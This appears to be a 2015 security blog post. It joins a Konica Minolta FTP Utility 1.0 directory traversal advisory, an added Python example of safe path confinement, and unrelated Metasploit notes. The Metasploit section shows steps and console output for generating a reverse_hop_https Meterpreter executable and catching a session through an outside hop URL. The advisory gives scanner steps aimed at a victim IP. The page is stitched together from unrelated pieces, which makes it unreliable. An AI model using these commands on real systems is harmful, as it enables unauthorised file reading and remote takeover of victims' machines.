Thursday 12 November 2015

Konica Minolta FTP Utility 1.0 - Directory Traversal Vulnerability



Overview

Directory traversal vulnerability in Konica Minolta FTP Utility 1.0 allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in a RETR command.
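As an added illustration, not code from the advisory or from the vendor, the following Python contrasts the naive path join behind this class of bug with a version that pins the resolved RETR argument inside the FTP root. The root path, file names and function names are assumptions constructed for the example; `ntpath` is used so the Windows-style `..\` handling runs on any host.

```python
import ntpath
from typing import Optional

# Constructed FTP root for the example; not taken from the product.
FTP_ROOT = r"C:\FTPUtility\share"


def naive_resolve(root: str, retr_arg: str) -> str:
    """Pattern behind this bug class: the RETR argument is appended to the
    share root as-is, so '..\\' segments walk out of the share."""
    return ntpath.normpath(root + "\\" + retr_arg)


def confined_resolve(root: str, retr_arg: str) -> Optional[str]:
    """Resolve the RETR argument and refuse anything outside the root.

    Returns the absolute path to serve, or None to reject the request.
    """
    # Windows accepts both separators, so treat '/' like '\\'.
    candidate = retr_arg.replace("/", "\\")
    # Drive-letter or UNC arguments are never relative to the share root.
    drive, tail = ntpath.splitdrive(candidate)
    if drive:
        return None
    # A leading separator would otherwise mean "root of the drive".
    tail = tail.lstrip("\\")
    root_norm = ntpath.normpath(root)
    full = ntpath.normpath(ntpath.join(root_norm, tail))
    # normpath has collapsed every '..'; the result must still sit under
    # the root. commonpath raises ValueError when the drives differ.
    try:
        inside = ntpath.commonpath([root_norm, full]) == root_norm
    except ValueError:
        inside = False
    return full if inside else None


# Constructed sample RETR arguments: one legitimate, the rest traversal attempts.
SAMPLES = [
    r"docs\report.pdf",
    r"..\..\Windows\win.ini",
    "docs/../../boot.ini",
    r"C:\Windows\win.ini",
]

if __name__ == "__main__":
    for arg in SAMPLES:
        print(f"{arg!r:28} naive={naive_resolve(FTP_ROOT, arg)!r:44} "
              f"confined={confined_resolve(FTP_ROOT, arg)!r}")
```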


Vulnerable software and versions

* cpe:/a:konicaminolta:ftp_utility:1.0


Proof of concept:

Step 1. use auxiliary/scanner/ftp/konica_ftp_traversal

Step 2. set rhosts <victim IP>

Step 3. set verbose TRUE

Step 4. run



HTTPS support in both shellcode and handler

The reverse_hop_http module now works with HTTPS.

Verification Steps

  1. Place the /data/php/hop.php script on a server with PHP support.

  2. Load the payload, set the HOPURL appropriately, and generate an exe.

  3. Store the exe on the "victim" machine.

  4. Use exploit/multi/handler with the reverse_hop_https payload.

  5. Execute the hop payload exe on the "victim" machine.



Proof of concept:

msf > use payload/windows/meterpreter/reverse_hop_http

msf payload(reverse_hop_http) > set HOPURL https://192.168.1.23/h.php
HOPURL => https://192.168.1.23/h.php

msf payload(reverse_hop_http) > generate -t exe -f hop.exe
[*] Writing 73802 bytes to hop.exe...

msf payload(reverse_hop_http) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_hop_http
PAYLOAD => windows/meterpreter/reverse_hop_http

msf exploit(handler) > set HOPURL https://192.168.1.23/h.php
HOPURL => https://192.168.1.23/h.php

msf exploit(handler) > exploit

[*] Preparing stage for next session nLxTeqmU1V-UCZQJwk2TvwB3XGe40qBOgvZVHPCyOP9IrUFsrEy4xPJZIZ6ttMrGqpZbacU
[*] Starting the payload handler...
[*] Uploaded stage to hop https://192.168.1.23/h.php?/
[*] Meterpreter session 1 opened (Hop client -> scriptjunkie.us:443) at 2015-11-11 21:30:16 -0600
[*] Preparing stage for next session uAHZHR2pS-ENdw13WzMKvwPcR5sR_-ibOWyFdmZ7sYp5SDRAauDRJtANqI9zUJFU47bQHK7Bmw